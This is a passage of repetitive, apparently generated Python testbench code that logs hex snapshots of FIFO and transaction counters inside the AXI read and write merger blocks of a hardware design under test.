logs.log_info("SNP %x tb.dut.merge12.axi_wr_4_merger.c_b_fifo.count" % logs.peek("tb.dut.merge12.axi_wr_4_merger.c_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge12.axi_wr_4_merger.c_win_fifo.count" % logs.peek("tb.dut.merge12.axi_wr_4_merger.c_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge12.axi_wr_4_merger.c_win_fifo.int_count" % logs.peek("tb.dut.merge12.axi_wr_4_merger.c_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge12.axi_wr_4_merger.d_aw_fifo.count" % logs.peek("tb.dut.merge12.axi_wr_4_merger.d_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge12.axi_wr_4_merger.d_aw_fifo.int_count" % logs.peek("tb.dut.merge12.axi_wr_4_merger.d_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge12.axi_wr_4_merger.d_b_fifo.next_count" % logs.peek("tb.dut.merge12.axi_wr_4_merger.d_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge12.axi_wr_4_merger.d_b_fifo.count" % logs.peek("tb.dut.merge12.axi_wr_4_merger.d_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge12.axi_wr_4_merger.d_win_fifo.count" % logs.peek("tb.dut.merge12.axi_wr_4_merger.d_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge12.axi_wr_4_merger.d_win_fifo.int_count" % logs.peek("tb.dut.merge12.axi_wr_4_merger.d_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge13.axi_rd_4_merger.a_rcount" % logs.peek("tb.dut.merge13.axi_rd_4_merger.a_rcount"))
logs.log_info("SNP %x tb.dut.merge13.axi_rd_4_merger.b_rcount" % logs.peek("tb.dut.merge13.axi_rd_4_merger.b_rcount"))
logs.log_info("SNP %x tb.dut.merge13.axi_rd_4_merger.c_rcount" % logs.peek("tb.dut.merge13.axi_rd_4_merger.c_rcount"))
logs.log_info("SNP %x tb.dut.merge13.axi_rd_4_merger.d_rcount" % logs.peek("tb.dut.merge13.axi_rd_4_merger.d_rcount"))
logs.log_info("SNP %x tb.dut.merge13.axi_rd_4_merger.a_ar_fifo.count" % logs.peek("tb.dut.merge13.axi_rd_4_merger.a_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge13.axi_rd_4_merger.a_ar_fifo.int_count" % logs.peek("tb.dut.merge13.axi_rd_4_merger.a_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge13.axi_rd_4_merger.a_ids_fifo.next_count" % logs.peek("tb.dut.merge13.axi_rd_4_merger.a_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge13.axi_rd_4_merger.a_ids_fifo.count" % logs.peek("tb.dut.merge13.axi_rd_4_merger.a_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge13.axi_rd_4_merger.b_ar_fifo.count" % logs.peek("tb.dut.merge13.axi_rd_4_merger.b_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge13.axi_rd_4_merger.b_ar_fifo.int_count" % logs.peek("tb.dut.merge13.axi_rd_4_merger.b_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge13.axi_rd_4_merger.b_ids_fifo.next_count" % logs.peek("tb.dut.merge13.axi_rd_4_merger.b_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge13.axi_rd_4_merger.b_ids_fifo.count" % logs.peek("tb.dut.merge13.axi_rd_4_merger.b_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge13.axi_rd_4_merger.c_ar_fifo.count" % logs.peek("tb.dut.merge13.axi_rd_4_merger.c_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge13.axi_rd_4_merger.c_ar_fifo.int_count" % logs.peek("tb.dut.merge13.axi_rd_4_merger.c_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge13.axi_rd_4_merger.c_ids_fifo.next_count" % logs.peek("tb.dut.merge13.axi_rd_4_merger.c_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge13.axi_rd_4_merger.c_ids_fifo.count" % logs.peek("tb.dut.merge13.axi_rd_4_merger.c_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge13.axi_rd_4_merger.d_ar_fifo.count" % logs.peek("tb.dut.merge13.axi_rd_4_merger.d_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge13.axi_rd_4_merger.d_ar_fifo.int_count" % logs.peek("tb.dut.merge13.axi_rd_4_merger.d_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge13.axi_rd_4_merger.d_ids_fifo.next_count" % logs.peek("tb.dut.merge13.axi_rd_4_merger.d_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge13.axi_rd_4_merger.d_ids_fifo.count" % logs.peek("tb.dut.merge13.axi_rd_4_merger.d_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge13.axi_wr_4_merger.panic_acount" % logs.peek("tb.dut.merge13.axi_wr_4_merger.panic_acount"))
logs.log_info("SNP %x tb.dut.merge13.axi_wr_4_merger.panic_bcount" % logs.peek("tb.dut.merge13.axi_wr_4_merger.panic_bcount"))
logs.log_info("SNP %x tb.dut.merge13.axi_wr_4_merger.panic_ccount" % logs.peek("tb.dut.merge13.axi_wr_4_merger.panic_ccount"))
logs.log_info("SNP %x tb.dut.merge13.axi_wr_4_merger.panic_dcount" % logs.peek("tb.dut.merge13.axi_wr_4_merger.panic_dcount"))
logs.log_info("SNP %x tb.dut.merge13.axi_wr_4_merger.a_bcount" % logs.peek("tb.dut.merge13.axi_wr_4_merger.a_bcount"))
logs.log_info("SNP %x tb.dut.merge13.axi_wr_4_merger.b_bcount" % logs.peek("tb.dut.merge13.axi_wr_4_merger.b_bcount"))
logs.log_info("SNP %x tb.dut.merge13.axi_wr_4_merger.c_bcount" % logs.peek("tb.dut.merge13.axi_wr_4_merger.c_bcount"))
logs.log_info("SNP %x tb.dut.merge13.axi_wr_4_merger.d_bcount" % logs.peek("tb.dut.merge13.axi_wr_4_merger.d_bcount"))
logs.log_info("SNP %x tb.dut.merge13.axi_wr_4_merger.a_aw_fifo.count" % logs.peek("tb.dut.merge13.axi_wr_4_merger.a_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge13.axi_wr_4_merger.a_aw_fifo.int_count" % logs.peek("tb.dut.merge13.axi_wr_4_merger.a_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge13.axi_wr_4_merger.a_b_fifo.next_count" % logs.peek("tb.dut.merge13.axi_wr_4_merger.a_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge13.axi_wr_4_merger.a_b_fifo.count" % logs.peek("tb.dut.merge13.axi_wr_4_merger.a_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge13.axi_wr_4_merger.a_win_fifo.count" % logs.peek("tb.dut.merge13.axi_wr_4_merger.a_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge13.axi_wr_4_merger.a_win_fifo.int_count" % logs.peek("tb.dut.merge13.axi_wr_4_merger.a_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge13.axi_wr_4_merger.b_aw_fifo.count" % logs.peek("tb.dut.merge13.axi_wr_4_merger.b_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge13.axi_wr_4_merger.b_aw_fifo.int_count" % logs.peek("tb.dut.merge13.axi_wr_4_merger.b_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge13.axi_wr_4_merger.b_b_fifo.next_count" % logs.peek("tb.dut.merge13.axi_wr_4_merger.b_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge13.axi_wr_4_merger.b_b_fifo.count" % logs.peek("tb.dut.merge13.axi_wr_4_merger.b_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge13.axi_wr_4_merger.b_out_fifo.next_count" % logs.peek("tb.dut.merge13.axi_wr_4_merger.b_out_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge13.axi_wr_4_merger.b_out_fifo.count" % logs.peek("tb.dut.merge13.axi_wr_4_merger.b_out_fifo.count"))
logs.log_info("SNP %x tb.dut.merge13.axi_wr_4_merger.b_win_fifo.count" % logs.peek("tb.dut.merge13.axi_wr_4_merger.b_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge13.axi_wr_4_merger.b_win_fifo.int_count" % logs.peek("tb.dut.merge13.axi_wr_4_merger.b_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge13.axi_wr_4_merger.c_aw_fifo.count" % logs.peek("tb.dut.merge13.axi_wr_4_merger.c_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge13.axi_wr_4_merger.c_aw_fifo.int_count" % logs.peek("tb.dut.merge13.axi_wr_4_merger.c_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge13.axi_wr_4_merger.c_b_fifo.next_count" % logs.peek("tb.dut.merge13.axi_wr_4_merger.c_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge13.axi_wr_4_merger.c_b_fifo.count" % logs.peek("tb.dut.merge13.axi_wr_4_merger.c_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge13.axi_wr_4_merger.c_win_fifo.count" % logs.peek("tb.dut.merge13.axi_wr_4_merger.c_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge13.axi_wr_4_merger.c_win_fifo.int_count" % logs.peek("tb.dut.merge13.axi_wr_4_merger.c_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge13.axi_wr_4_merger.d_aw_fifo.count" % logs.peek("tb.dut.merge13.axi_wr_4_merger.d_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge13.axi_wr_4_merger.d_aw_fifo.int_count" % logs.peek("tb.dut.merge13.axi_wr_4_merger.d_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge13.axi_wr_4_merger.d_b_fifo.next_count" % logs.peek("tb.dut.merge13.axi_wr_4_merger.d_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge13.axi_wr_4_merger.d_b_fifo.count" % logs.peek("tb.dut.merge13.axi_wr_4_merger.d_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge13.axi_wr_4_merger.d_win_fifo.count" % logs.peek("tb.dut.merge13.axi_wr_4_merger.d_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge13.axi_wr_4_merger.d_win_fifo.int_count" % logs.peek("tb.dut.merge13.axi_wr_4_merger.d_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge14.axi_rd_4_merger.a_rcount" % logs.peek("tb.dut.merge14.axi_rd_4_merger.a_rcount"))
logs.log_info("SNP %x tb.dut.merge14.axi_rd_4_merger.b_rcount" % logs.peek("tb.dut.merge14.axi_rd_4_merger.b_rcount"))
logs.log_info("SNP %x tb.dut.merge14.axi_rd_4_merger.c_rcount" % logs.peek("tb.dut.merge14.axi_rd_4_merger.c_rcount"))
logs.log_info("SNP %x tb.dut.merge14.axi_rd_4_merger.d_rcount" % logs.peek("tb.dut.merge14.axi_rd_4_merger.d_rcount"))
logs.log_info("SNP %x tb.dut.merge14.axi_rd_4_merger.a_ar_fifo.count" % logs.peek("tb.dut.merge14.axi_rd_4_merger.a_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge14.axi_rd_4_merger.a_ar_fifo.int_count" % logs.peek("tb.dut.merge14.axi_rd_4_merger.a_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge14.axi_rd_4_merger.a_ids_fifo.next_count" % logs.peek("tb.dut.merge14.axi_rd_4_merger.a_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge14.axi_rd_4_merger.a_ids_fifo.count" % logs.peek("tb.dut.merge14.axi_rd_4_merger.a_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge14.axi_rd_4_merger.b_ar_fifo.count" % logs.peek("tb.dut.merge14.axi_rd_4_merger.b_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge14.axi_rd_4_merger.b_ar_fifo.int_count" % logs.peek("tb.dut.merge14.axi_rd_4_merger.b_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge14.axi_rd_4_merger.b_ids_fifo.next_count" % logs.peek("tb.dut.merge14.axi_rd_4_merger.b_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge14.axi_rd_4_merger.b_ids_fifo.count" % logs.peek("tb.dut.merge14.axi_rd_4_merger.b_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge14.axi_rd_4_merger.c_ar_fifo.count" % logs.peek("tb.dut.merge14.axi_rd_4_merger.c_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge14.axi_rd_4_merger.c_ar_fifo.int_count" % logs.peek("tb.dut.merge14.axi_rd_4_merger.c_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge14.axi_rd_4_merger.c_ids_fifo.next_count" % logs.peek("tb.dut.merge14.axi_rd_4_merger.c_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge14.axi_rd_4_merger.c_ids_fifo.count" % logs.peek("tb.dut.merge14.axi_rd_4_merger.c_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge14.axi_rd_4_merger.d_ar_fifo.count" % logs.peek("tb.dut.merge14.axi_rd_4_merger.d_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge14.axi_rd_4_merger.d_ar_fifo.int_count" % logs.peek("tb.dut.merge14.axi_rd_4_merger.d_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge14.axi_rd_4_merger.d_ids_fifo.next_count" % logs.peek("tb.dut.merge14.axi_rd_4_merger.d_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge14.axi_rd_4_merger.d_ids_fifo.count" % logs.peek("tb.dut.merge14.axi_rd_4_merger.d_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge14.axi_wr_4_merger.panic_acount" % logs.peek("tb.dut.merge14.axi_wr_4_merger.panic_acount"))
logs.log_info("SNP %x tb.dut.merge14.axi_wr_4_merger.panic_bcount" % logs.peek("tb.dut.merge14.axi_wr_4_merger.panic_bcount"))
logs.log_info("SNP %x tb.dut.merge14.axi_wr_4_merger.panic_ccount" % logs.peek("tb.dut.merge14.axi_wr_4_merger.panic_ccount"))
logs.log_info("SNP %x tb.dut.merge14.axi_wr_4_merger.panic_dcount" % logs.peek("tb.dut.merge14.axi_wr_4_merger.panic_dcount"))
logs.log_info("SNP %x tb.dut.merge14.axi_wr_4_merger.a_bcount" % logs.peek("tb.dut.merge14.axi_wr_4_merger.a_bcount"))
logs.log_info("SNP %x tb.dut.merge14.axi_wr_4_merger.b_bcount" % logs.peek("tb.dut.merge14.axi_wr_4_merger.b_bcount"))
logs.log_info("SNP %x tb.dut.merge14.axi_wr_4_merger.c_bcount" % logs.peek("tb.dut.merge14.axi_wr_4_merger.c_bcount"))
logs.log_info("SNP %x tb.dut.merge14.axi_wr_4_merger.d_bcount" % logs.peek("tb.dut.merge14.axi_wr_4_merger.d_bcount"))
logs.log_info("SNP %x tb.dut.merge14.axi_wr_4_merger.a_aw_fifo.count" % logs.peek("tb.dut.merge14.axi_wr_4_merger.a_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge14.axi_wr_4_merger.a_aw_fifo.int_count" % logs.peek("tb.dut.merge14.axi_wr_4_merger.a_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge14.axi_wr_4_merger.a_b_fifo.next_count" % logs.peek("tb.dut.merge14.axi_wr_4_merger.a_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge14.axi_wr_4_merger.a_b_fifo.count" % logs.peek("tb.dut.merge14.axi_wr_4_merger.a_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge14.axi_wr_4_merger.a_win_fifo.count" % logs.peek("tb.dut.merge14.axi_wr_4_merger.a_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge14.axi_wr_4_merger.a_win_fifo.int_count" % logs.peek("tb.dut.merge14.axi_wr_4_merger.a_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge14.axi_wr_4_merger.b_aw_fifo.count" % logs.peek("tb.dut.merge14.axi_wr_4_merger.b_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge14.axi_wr_4_merger.b_aw_fifo.int_count" % logs.peek("tb.dut.merge14.axi_wr_4_merger.b_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge14.axi_wr_4_merger.b_b_fifo.next_count" % logs.peek("tb.dut.merge14.axi_wr_4_merger.b_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge14.axi_wr_4_merger.b_b_fifo.count" % logs.peek("tb.dut.merge14.axi_wr_4_merger.b_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge14.axi_wr_4_merger.b_out_fifo.next_count" % logs.peek("tb.dut.merge14.axi_wr_4_merger.b_out_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge14.axi_wr_4_merger.b_out_fifo.count" % logs.peek("tb.dut.merge14.axi_wr_4_merger.b_out_fifo.count"))
logs.log_info("SNP %x tb.dut.merge14.axi_wr_4_merger.b_win_fifo.count" % logs.peek("tb.dut.merge14.axi_wr_4_merger.b_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge14.axi_wr_4_merger.b_win_fifo.int_count" % logs.peek("tb.dut.merge14.axi_wr_4_merger.b_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge14.axi_wr_4_merger.c_aw_fifo.count" % logs.peek("tb.dut.merge14.axi_wr_4_merger.c_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge14.axi_wr_4_merger.c_aw_fifo.int_count" % logs.peek("tb.dut.merge14.axi_wr_4_merger.c_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge14.axi_wr_4_merger.c_b_fifo.next_count" % logs.peek("tb.dut.merge14.axi_wr_4_merger.c_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge14.axi_wr_4_merger.c_b_fifo.count" % logs.peek("tb.dut.merge14.axi_wr_4_merger.c_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge14.axi_wr_4_merger.c_win_fifo.count" % logs.peek("tb.dut.merge14.axi_wr_4_merger.c_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge14.axi_wr_4_merger.c_win_fifo.int_count" % logs.peek("tb.dut.merge14.axi_wr_4_merger.c_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge14.axi_wr_4_merger.d_aw_fifo.count" % logs.peek("tb.dut.merge14.axi_wr_4_merger.d_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge14.axi_wr_4_merger.d_aw_fifo.int_count" % logs.peek("tb.dut.merge14.axi_wr_4_merger.d_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge14.axi_wr_4_merger.d_b_fifo.next_count" % logs.peek("tb.dut.merge14.axi_wr_4_merger.d_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge14.axi_wr_4_merger.d_b_fifo.count" % logs.peek("tb.dut.merge14.axi_wr_4_merger.d_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge14.axi_wr_4_merger.d_win_fifo.count" % logs.peek("tb.dut.merge14.axi_wr_4_merger.d_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge14.axi_wr_4_merger.d_win_fifo.int_count" % logs.peek("tb.dut.merge14.axi_wr_4_merger.d_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge15.axi_rd_4_merger.a_rcount" % logs.peek("tb.dut.merge15.axi_rd_4_merger.a_rcount"))
logs.log_info("SNP %x tb.dut.merge15.axi_rd_4_merger.b_rcount" % logs.peek("tb.dut.merge15.axi_rd_4_merger.b_rcount"))
logs.log_info("SNP %x tb.dut.merge15.axi_rd_4_merger.c_rcount" % logs.peek("tb.dut.merge15.axi_rd_4_merger.c_rcount"))
logs.log_info("SNP %x tb.dut.merge15.axi_rd_4_merger.d_rcount" % logs.peek("tb.dut.merge15.axi_rd_4_merger.d_rcount"))
logs.log_info("SNP %x tb.dut.merge15.axi_rd_4_merger.a_ar_fifo.count" % logs.peek("tb.dut.merge15.axi_rd_4_merger.a_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge15.axi_rd_4_merger.a_ar_fifo.int_count" % logs.peek("tb.dut.merge15.axi_rd_4_merger.a_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge15.axi_rd_4_merger.a_ids_fifo.next_count" % logs.peek("tb.dut.merge15.axi_rd_4_merger.a_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge15.axi_rd_4_merger.a_ids_fifo.count" % logs.peek("tb.dut.merge15.axi_rd_4_merger.a_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge15.axi_rd_4_merger.b_ar_fifo.count" % logs.peek("tb.dut.merge15.axi_rd_4_merger.b_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge15.axi_rd_4_merger.b_ar_fifo.int_count" % logs.peek("tb.dut.merge15.axi_rd_4_merger.b_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge15.axi_rd_4_merger.b_ids_fifo.next_count" % logs.peek("tb.dut.merge15.axi_rd_4_merger.b_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge15.axi_rd_4_merger.b_ids_fifo.count" % logs.peek("tb.dut.merge15.axi_rd_4_merger.b_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge15.axi_rd_4_merger.c_ar_fifo.count" % logs.peek("tb.dut.merge15.axi_rd_4_merger.c_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge15.axi_rd_4_merger.c_ar_fifo.int_count" % logs.peek("tb.dut.merge15.axi_rd_4_merger.c_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge15.axi_rd_4_merger.c_ids_fifo.next_count" % logs.peek("tb.dut.merge15.axi_rd_4_merger.c_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge15.axi_rd_4_merger.c_ids_fifo.count" % logs.peek("tb.dut.merge15.axi_rd_4_merger.c_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge15.axi_rd_4_merger.d_ar_fifo.count" % logs.peek("tb.dut.merge15.axi_rd_4_merger.d_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge15.axi_rd_4_merger.d_ar_fifo.int_count" % logs.peek("tb.dut.merge15.axi_rd_4_merger.d_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge15.axi_rd_4_merger.d_ids_fifo.next_count" % logs.peek("tb.dut.merge15.axi_rd_4_merger.d_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge15.axi_rd_4_merger.d_ids_fifo.count" % logs.peek("tb.dut.merge15.axi_rd_4_merger.d_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge15.axi_wr_4_merger.panic_acount" % logs.peek("tb.dut.merge15.axi_wr_4_merger.panic_acount"))
logs.log_info("SNP %x tb.dut.merge15.axi_wr_4_merger.panic_bcount" % logs.peek("tb.dut.merge15.axi_wr_4_merger.panic_bcount"))
logs.log_info("SNP %x tb.dut.merge15.axi_wr_4_merger.panic_ccount" % logs.peek("tb.dut.merge15.axi_wr_4_merger.panic_ccount"))
logs.log_info("SNP %x tb.dut.merge15.axi_wr_4_merger.panic_dcount" % logs.peek("tb.dut.merge15.axi_wr_4_merger.panic_dcount"))
logs.log_info("SNP %x tb.dut.merge15.axi_wr_4_merger.a_bcount" % logs.peek("tb.dut.merge15.axi_wr_4_merger.a_bcount"))
logs.log_info("SNP %x tb.dut.merge15.axi_wr_4_merger.b_bcount" % logs.peek("tb.dut.merge15.axi_wr_4_merger.b_bcount"))
logs.log_info("SNP %x tb.dut.merge15.axi_wr_4_merger.c_bcount" % logs.peek("tb.dut.merge15.axi_wr_4_merger.c_bcount"))
logs.log_info("SNP %x tb.dut.merge15.axi_wr_4_merger.d_bcount" % logs.peek("tb.dut.merge15.axi_wr_4_merger.d_bcount"))
logs.log_info("SNP %x tb.dut.merge15.axi_wr_4_merger.a_aw_fifo.count" % logs.peek("tb.dut.merge15.axi_wr_4_merger.a_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge15.axi_wr_4_merger.a_aw_fifo.int_count" % logs.peek("tb.dut.merge15.axi_wr_4_merger.a_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge15.axi_wr_4_merger.a_b_fifo.next_count" % logs.peek("tb.dut.merge15.axi_wr_4_merger.a_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge15.axi_wr_4_merger.a_b_fifo.count" % logs.peek("tb.dut.merge15.axi_wr_4_merger.a_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge15.axi_wr_4_merger.a_win_fifo.count" % logs.peek("tb.dut.merge15.axi_wr_4_merger.a_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge15.axi_wr_4_merger.a_win_fifo.int_count" % logs.peek("tb.dut.merge15.axi_wr_4_merger.a_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge15.axi_wr_4_merger.b_aw_fifo.count" % logs.peek("tb.dut.merge15.axi_wr_4_merger.b_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge15.axi_wr_4_merger.b_aw_fifo.int_count" % logs.peek("tb.dut.merge15.axi_wr_4_merger.b_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge15.axi_wr_4_merger.b_b_fifo.next_count" % logs.peek("tb.dut.merge15.axi_wr_4_merger.b_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge15.axi_wr_4_merger.b_b_fifo.count" % logs.peek("tb.dut.merge15.axi_wr_4_merger.b_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge15.axi_wr_4_merger.b_out_fifo.next_count" % logs.peek("tb.dut.merge15.axi_wr_4_merger.b_out_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge15.axi_wr_4_merger.b_out_fifo.count" % logs.peek("tb.dut.merge15.axi_wr_4_merger.b_out_fifo.count"))
logs.log_info("SNP %x tb.dut.merge15.axi_wr_4_merger.b_win_fifo.count" % logs.peek("tb.dut.merge15.axi_wr_4_merger.b_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge15.axi_wr_4_merger.b_win_fifo.int_count" % logs.peek("tb.dut.merge15.axi_wr_4_merger.b_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge15.axi_wr_4_merger.c_aw_fifo.count" % logs.peek("tb.dut.merge15.axi_wr_4_merger.c_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge15.axi_wr_4_merger.c_aw_fifo.int_count" % logs.peek("tb.dut.merge15.axi_wr_4_merger.c_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge15.axi_wr_4_merger.c_b_fifo.next_count" % logs.peek("tb.dut.merge15.axi_wr_4_merger.c_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge15.axi_wr_4_merger.c_b_fifo.count" % logs.peek("tb.dut.merge15.axi_wr_4_merger.c_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge15.axi_wr_4_merger.c_win_fifo.count" % logs.peek("tb.dut.merge15.axi_wr_4_merger.c_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge15.axi_wr_4_merger.c_win_fifo.int_count" % logs.peek("tb.dut.merge15.axi_wr_4_merger.c_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge15.axi_wr_4_merger.d_aw_fifo.count" % logs.peek("tb.dut.merge15.axi_wr_4_merger.d_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge15.axi_wr_4_merger.d_aw_fifo.int_count" % logs.peek("tb.dut.merge15.axi_wr_4_merger.d_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge15.axi_wr_4_merger.d_b_fifo.next_count" % logs.peek("tb.dut.merge15.axi_wr_4_merger.d_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge15.axi_wr_4_merger.d_b_fifo.count" % logs.peek("tb.dut.merge15.axi_wr_4_merger.d_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge15.axi_wr_4_merger.d_win_fifo.count" % logs.peek("tb.dut.merge15.axi_wr_4_merger.d_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge15.axi_wr_4_merger.d_win_fifo.int_count" % logs.peek("tb.dut.merge15.axi_wr_4_merger.d_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge2.axi_rd_4_merger.a_rcount" % logs.peek("tb.dut.merge2.axi_rd_4_merger.a_rcount"))
logs.log_info("SNP %x tb.dut.merge2.axi_rd_4_merger.b_rcount" % logs.peek("tb.dut.merge2.axi_rd_4_merger.b_rcount"))
logs.log_info("SNP %x tb.dut.merge2.axi_rd_4_merger.c_rcount" % logs.peek("tb.dut.merge2.axi_rd_4_merger.c_rcount"))
logs.log_info("SNP %x tb.dut.merge2.axi_rd_4_merger.d_rcount" % logs.peek("tb.dut.merge2.axi_rd_4_merger.d_rcount"))
logs.log_info("SNP %x tb.dut.merge2.axi_rd_4_merger.a_ar_fifo.count" % logs.peek("tb.dut.merge2.axi_rd_4_merger.a_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge2.axi_rd_4_merger.a_ar_fifo.int_count" % logs.peek("tb.dut.merge2.axi_rd_4_merger.a_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge2.axi_rd_4_merger.a_ids_fifo.next_count" % logs.peek("tb.dut.merge2.axi_rd_4_merger.a_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge2.axi_rd_4_merger.a_ids_fifo.count" % logs.peek("tb.dut.merge2.axi_rd_4_merger.a_ids_fifo.count"))
